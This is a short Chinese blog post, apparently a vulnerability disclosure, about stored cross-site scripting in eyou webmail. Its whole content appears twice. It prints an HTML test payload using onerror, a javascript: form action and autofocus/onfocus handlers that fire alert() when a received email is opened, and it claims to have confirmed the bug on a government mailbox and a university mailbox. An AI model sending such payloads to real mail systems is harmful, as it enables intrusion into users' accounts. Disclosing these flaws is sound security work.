时间:2015-2-11 作者:admin 分类: 技术交流
由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。
测试代码:
<!--[if true]><img onerror=alert(1) src=--><form
action=javascript:alert(2)><input type=submit><input
autofocus onfocus=alert(3)><select autofocus
onfocus=alert(4)><textarea autofocus
onfocus=alert(5)>发送后打开,效果如图:
某党政机关邮箱:
某院校邮箱:
漏洞证明:
由于eyou版本号不同,下面测试代码的效果也有细微区别,但是存在漏洞原因相同。
测试代码:
<!--[if true]><img onerror=alert(1) src=--><form
action=javascript:alert(2)><input type=submit><input
autofocus onfocus=alert(3)><select autofocus
onfocus=alert(4)><textarea autofocus
onfocus=alert(5)>发送后打开,效果如图:
某党政机关邮箱:
某院校邮箱:
评论:
